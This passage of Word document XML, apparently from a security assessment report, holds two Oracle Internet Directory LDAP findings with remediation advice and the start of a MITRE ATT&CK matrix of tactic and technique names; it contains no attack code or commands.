          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D2BB5" w:rsidRPr="001019D3" w14:paraId="2A8FCBE9" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7095E236" w14:textId="399F3180" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="411416EC" w14:textId="4DCADB5A" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="00E224E7" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Anonymous access to Oracle Internet Directory (OID) LDAP service reveals Oracle topology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3AC02564" w14:textId="7B626CD0" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement strict access controls on Oracle Internet Directory (OID), including authentication for all search and query operations, and limit anonymous connections. Restrict access to sensitive data and only allow trusted hosts and applications to connect. Enable logging and monitoring to detect unusual </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>activity, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> integrate with a Security Information and Event Management (SIEM) system for real-time alerting. Regularly audit permissions and access controls, and conduct security assessments to identify and address potential vulnerabilities, ensuring the security and integrity of your OID environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D2BB5" w:rsidRPr="001019D3" w14:paraId="0223DF99" w14:textId="77777777" w:rsidTr="002037B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="698E73BF" w14:textId="7B9D7F97" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18FB58E1" w14:textId="4B9F64AD" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unencrypted Oracle Internet Directory (OID ) LDAP service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7D8D7831" w14:textId="25A6D513" w:rsidR="009D2BB5" w:rsidRPr="001019D3" w:rsidRDefault="009D2BB5" w:rsidP="009D2BB5">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Implement Simple Authentication and Security Layer (SASL) on Oracle Internet Directory (OID) to add an extra layer of authentication and security and disable any unencrypted protocol support to prevent potential eavesdropping and data breaches, ensuring all interactions with OID are protected and secure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="332FEAEC" w14:textId="77777777" w:rsidR="009D38DD" w:rsidRPr="001019D3" w:rsidRDefault="009D38DD" w:rsidP="009D38DD"/>
    <w:p w14:paraId="26A537DA" w14:textId="361B0DE2" w:rsidR="009D38DD" w:rsidRPr="001019D3" w:rsidRDefault="009D38DD" w:rsidP="009D38DD">
      <w:pPr>
        <w:sectPr w:rsidR="009D38DD" w:rsidRPr="001019D3" w:rsidSect="0047154C">
          <w:footerReference w:type="first" r:id="rId45"/>
          <w:endnotePr>
            <w:numFmt w:val="lowerLetter"/>
          </w:endnotePr>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1021" w:right="1588" w:bottom="1021" w:left="1588" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="326"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1774E71E" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="001C03A4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc212654671"/>
      <w:bookmarkStart w:id="215" w:name="_Toc213253578"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ATT&amp;CK matrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w14:paraId="7AD339C5" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="004C32C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK is composed of 14 tactics (TA) and each TA has several Techniques (T). Each of the findings is applicable to at least one technique. The full list of tactics and techniques of the MITRE ATT&amp;CK matrix can be found in the matrix shown below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="181" w:rightFromText="181" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="1"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1221"/>
        <w:gridCol w:w="1052"/>
        <w:gridCol w:w="838"/>
        <w:gridCol w:w="995"/>
        <w:gridCol w:w="933"/>
        <w:gridCol w:w="877"/>
        <w:gridCol w:w="1295"/>
        <w:gridCol w:w="933"/>
        <w:gridCol w:w="1318"/>
        <w:gridCol w:w="933"/>
        <w:gridCol w:w="1093"/>
        <w:gridCol w:w="1108"/>
        <w:gridCol w:w="1108"/>
        <w:gridCol w:w="1108"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C32C3" w:rsidRPr="001019D3" w14:paraId="3F1A2F4C" w14:textId="77777777" w:rsidTr="004C32C3">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="145C2C89"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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F2541E3"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Resource Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="435D6B32"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Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71E62CCF"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Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="265204A0"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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="338838AE"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Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0BF33ACA" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Defence Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D23071E" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13D4B210" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61BFD113" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16C4A7C3" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11649FDC" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C55815A" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57505002" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32C3" w:rsidRPr="001019D3" w14:paraId="31C1C54D" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A9556E4" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Active Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E335253" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Acquire Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11EA30C4" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Content Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="605D975C" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Cloud Administration Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01847B31" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Account Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5276C750" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Abuse Elevation Control Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31C930F7" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Abuse Elevation Control Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E683E10" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Adversary-in-the-Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5021A67B" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Account Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35FC9F24" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exploitation of Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3771F57B" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Adversary-in-the-Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29E33B83" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Application Layer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D6EE38A" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
